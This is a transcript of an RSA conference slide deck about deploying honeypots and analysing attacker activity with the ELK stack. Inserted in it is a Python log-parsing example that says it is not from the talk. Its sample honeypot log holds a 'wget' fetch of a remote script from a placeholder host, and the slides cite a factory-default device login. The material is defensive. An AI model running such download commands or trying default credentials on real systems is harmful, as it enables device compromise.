Post on 06-Mar-2018

216 views

Category:

Documents


1 download

TRANSCRIPT

SESSION ID:

#RSAC

Abhinav Singh

Cloud Servers, Honeypots & ELK-The Path To Attaining Cyber-Hunting Nirvana!

FLE1-F04

Security Researcher

@abhinavbom #malwaremustdie!

Presenter’s Company

Logo – replace on

master slide

#RSAC

Disclaimer

2

The views expressed in this presentation are my personal views and do not necessarily reflect views of my employer. They do not represent (nor are they intended to represent) the positions, opinions or policies of my employer or any other company or person. This presentation is not intended to make product or deployment recommendations.


About Me

3

Security researcher. Speaker at Blackhat, Null, GroundZero etc.

Author: Metasploit Penetration Testing Cookbook (1st & 2nd Ed.)

Udemy Course On Metasploit.

Linkedin.com/in/abhinavbom

@abhinavbom

@MalwareMustDie!


AGENDA

4

Choosing and deploying your honeypots.

Cloud server instance (IaaS).

ELK stack (Elasticsearch, Logstash, Kibana).

Building intelligence.

Process, Patch and Hunt.

Conclusion.


Varanasi, India


Honeypots

6

A server/setup that is configured to detect an intruder by mirroring a real production system.

Isolated from the main network.

Intruder activities are monitored, captured and stored.

Two classes: low-interaction and high-interaction honeypots.


Brief History Of Honeypots

7

1990-1991: First studies released by Clifford Stoll (The Cuckoo's Egg) & Bill Cheswick (An Evening with Berferd).

1996-1997: Deception Toolkit introduced by Fred Cohen.

1998: First commercial honeypot CyberCop Sting released.

1999-2000: Honeynet project came into existence.

2001-2005: Honeypot research becomes mainstream.

Focus shifts from honeypots to mainstream threat detection technologies.


Picking Your Honey!!

8

SSH: Kippo, Cowrie, Hornet.

Web Apps: Glastopf, Wordpot, ShockPot, Thug.

ICS/SCADA: Conpot, Gridpot.

Emails: Spambot, Spamhole.

Github.com/abhinavbom/awesome-honeypots


Multi-pots Setup

9

T-pot (by T-Mobile) - http://dtag-dev-sec.github.io/mediator/feature/2015/03/17/concept.html

MHN (By ThreatStream) - https://github.com/threatstream/mhn


Cloud Servers (IaaS)

10

Virtual cloud servers, similar to virtualization.

On demand computing resources.

Scalability, reliability, high uptime.

Pay for what you use.

Amazon Web Services, Google Cloud, DigitalOcean etc.


Basic Requirements and Cost Estimation

11

50 GB storage.

2 GB RAM.

Preferably Linux environment.

Approximate cost of $10/month.


Defining Security Groups

12


ELK Stack

13

Elasticsearch: Store, Search & Analyze.

Logstash: Collect, Enrich & Transport.

Kibana: Explore, Visualize and Share.


Log Processing

14

Centralize data processing of all types.

Normalize varying schemas and formats.

A fast and convenient way to parse logs in a standardized manner.

https://www.elastic.co/products/logstash


Defining the Config File

15


Manage Input Configuration

16


Creating Filter Configurations

17


Output Config

18


19


Search & Indexing - Elasticsearch

20

Search server based on Lucene.

Distributed, scalable, and highly available.

Schema-free JSON documents, RESTful API.

Cross platform, open source.

https://www.elastic.co/products/elasticsearch


Elasticsearch Architecture

21

Diagram labels: Logstash.conf, Elasticsearch default web access, Elasticsearch.yaml.


Log Visualization with Kibana

22

Flexible analytics and visualization platform.

Real-time summary, charting and dashboard generation for streaming data.

Architected to work with Elasticsearch.

https://www.elastic.co/products/kibana


Configure Index Pattern

23


24


25

Diagram labels: Log Source 1, Log Source 2, Log Source 3, Log Source 4.


Discovering attack patterns

26

Brute-force attempts.

Successful authentication.

Command executions.

Attacker GeoIP location.

File uploads.

Malicious Web requests.
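Once the honeypot logs are normalized, the patterns listed above fall out of a few aggregations. As an added example (not code from the talk, from Cowrie or from Logstash), here is a small Python stand-in for the Logstash filter stage: it flattens constructed honeypot JSON lines into one schema and flags brute-force sources, successful logins, executed commands and file downloads. The field and eventid names are modelled on Cowrie's JSON log format and are assumptions here.

```python
# Added example, not code from the talk: a Python stand-in for the Logstash
# filter stage. Field/eventid names are modelled on Cowrie's JSON log and are
# assumptions; the log lines below are constructed, not captured traffic.
import json
from collections import Counter

SAMPLE_LOG = """\
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.7","username":"root","password":"123456","timestamp":"2018-03-01T10:00:01Z"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.7","username":"admin","password":"admin","timestamp":"2018-03-01T10:00:02Z"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.7","username":"ubnt","password":"ubnt1","timestamp":"2018-03-01T10:00:03Z"}
{"eventid":"cowrie.login.success","src_ip":"203.0.113.7","username":"ubnt","password":"ubnt","timestamp":"2018-03-01T10:00:04Z"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.7","input":"cd /tmp; wget http://example.invalid/x.sh","timestamp":"2018-03-01T10:00:05Z"}
{"eventid":"cowrie.session.file_download","src_ip":"203.0.113.7","url":"http://example.invalid/x.sh","timestamp":"2018-03-01T10:00:06Z"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.9","username":"root","password":"toor","timestamp":"2018-03-01T10:01:00Z"}
not json at all
"""

BRUTE_FORCE_THRESHOLD = 3  # failed logins from one source before it is flagged

def normalize(line):
    """Parse one JSON log line into the common schema; None if unparseable."""
    try:
        raw = json.loads(line)
    except ValueError:
        return None
    return {
        "ts": raw.get("timestamp"),
        "src": raw.get("src_ip"),
        # keep only the last eventid segment: failed / success / input / file_download
        "event": raw.get("eventid", "").rsplit(".", 1)[-1],
        "user": raw.get("username"),
        "pw": raw.get("password"),
        "cmd": raw.get("input"),
        "url": raw.get("url"),
    }

def summarize(text):
    """Return the attack-pattern summary a Kibana dashboard would chart."""
    lines = [l for l in text.splitlines() if l]
    events = [e for e in map(normalize, lines) if e]
    failed = Counter(e["src"] for e in events if e["event"] == "failed")
    return {
        "brute_force_sources": sorted(ip for ip, n in failed.items() if n >= BRUTE_FORCE_THRESHOLD),
        "successful_logins": [(e["src"], e["user"], e["pw"]) for e in events if e["event"] == "success"],
        "commands": [e["cmd"] for e in events if e["event"] == "input"],
        "downloads": [e["url"] for e in events if e["event"] == "file_download"],
        "dropped_lines": len(lines) - len(events),  # unparseable lines, worth alerting on
    }

if __name__ == "__main__":
    print(json.dumps(summarize(SAMPLE_LOG), indent=2))
```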


27


28

Suspicious Command Executions


Malware Downloads

29


Analytics dashboard

30

Displays saved visualizations and queries in groups and charts.

Each visualization consists of resizable containers.

Interactive and detailed.


Global Geo-IP tagging

31


Credentials Dashboard

32


Manual Insight based on Visual Data

33

Observing peaks and lows.

Location patterns.

Correlating Events from multiple sources.

OSINT.


Ubnt:Ubnt

34

Factory-default credentials for Ubiquiti Networks appliances.

Product range covers CCTV, VoIP, routing etc.

http://www.extremetech.com/computing/205525-anonymous-may-have-hijacked-thousands-of-routers-for-zombie-botnet


Top Command Executions

35

Something special about /tmp/.xs/…

http://blog.cari.net/carisirt-defaulting-on-passwords-part-1-r0_bot/


Web Attacks

36

Blind SQLi attempts.

Unconditional redirects.

Malicious Command injections through web requests.

CMS plugin exploits (WordPress, Joomla etc.).


Web attacks

37


38


Malware Downloads

39


Attacking Your Own Honeypots

40

Mimic the frequent activities captured in your logs: fingerprinting the fingerprints.

Scan (attack) your honeypot.

Detect leakage (based on your attacks).

Patch the code.


41


Fingerprinting the fingerprints

42


Attack Your Honeypots and Detect Leakage

43


Patch The Code

44

Fork the project and add your modifications.

Open an issue for developer fixes (less reliable).

Randomize as much as possible.

See you at “The HoneyNet Project” - www.honeynet.org/project


Questions